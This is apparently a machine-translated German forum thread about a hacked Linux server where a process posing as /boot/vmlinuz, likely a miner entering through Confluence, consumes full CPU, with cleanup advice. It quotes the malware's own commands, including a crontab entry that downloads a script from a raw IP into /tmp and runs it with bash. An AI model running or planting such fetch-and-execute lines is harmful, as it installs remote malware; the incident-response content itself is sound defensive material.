GNU/Linux >> LINUX-Kenntnisse >  >> Linux

vmlinuz-Prozess läuft auf 100 % CPU

Ihr Server sieht aus wie gehackt. Bitte schauen Sie sich die Prozessliste genau an. Führen Sie ps auxc aus und werfen Sie einen Blick auf Prozess-Binärquellen.

Sie können Tools wie rkhunter verwenden, um Ihren Server zu scannen, aber im Allgemeinen sollten Sie zu Beginn alles beenden, was als Confluence-Benutzer zu Mittag gegessen wurde, Ihren Server/Account scannen, Ihr Confluence aktualisieren (in den meisten Fällen eine benutzerbestimmte Angriffsquelle) und nachsehen in Ihrem Confluence für zusätzliche Accounts etc.

Möchten Sie sehen, was sich in diesem Prozess befindet, werfen Sie einen Blick auf /proc, z. in ls -la /proc/996 . Sie werden dort auch die Quellbinärdatei sehen. Sie können auch strace -ff -p 996 zu Mittag essen um zu sehen, was der Prozess macht oder cat /proc/996/exe | strings um zu sehen, welche Zeichenfolgen diese Binärdatei hat. Dies ist wahrscheinlich eine Art Botnet-Teil, Miner usw.


Ich hatte das gleiche Problem, es wurde gehackt, das Virenskript war unter /tmp, finde den Skriptnamen aus dem Befehl "top" (bedeutungslose Buchstaben, der Name von "fcbk6hj" war meins.) und beende die Prozesse (vielleicht 3 Prozesse)

root 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKglroot 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHlroot 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot

töte sie alle und lösche /tmp/prot und töte den Prozess von /boot/vmlinuz, CPU ist wieder da.

Ich fand heraus, dass der Virus das Skript automatisch nach /tmp heruntergeladen hatte, meine Methode war mv wgetak zu einem anderen Namen.

Virusverhalten:wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo

folgende Aufgabe gefunden wurde in crontab geschrieben, einfach löschen:*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 &&bash /tmp/seasame


Nachdem Sie dies aus System und Crontab entfernt haben, ist es vielleicht (zumindest vorerst) eine gute Idee, Confluence-Benutzer zu /etc/cron.deny hinzuzufügen .

Und danach:

$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information

Linux

  1. So begrenzen Sie die CPU-Auslastung eines Prozesses in Linux

  2. Warum zeigt Windows 10 VM immer 100 % CPU-Auslastung auf QEMU-KVM an?

  3. Linux – Wie beschränke ich einen Prozess auf einen CPU-Kern in Linux??

  4. Erkennen Sie Prozess, der CPU frisst, ohne:Top, Htop, Ps?

  5. CPU-Auslastung und Speicherauslastung eines einzelnen Prozesses unter Linux abrufen?

Tipps für oben:Überwachung der CPU-Last unter Linux

So erstellen Sie 100% CPU-Last auf einem Linux-System

So erhalten Sie die CPU-Auslastung eines einzelnen Prozesses in Linux

Behebung von gvfsd-smb-browse, das 100 % CPU in Ubuntu belegt

Kswapd0 nimmt 100% CPU-Zeit auf Ubuntu 18.04?

Verlangsamen Sie nur einen Prozess, um die CPU-Temperatur zu regulieren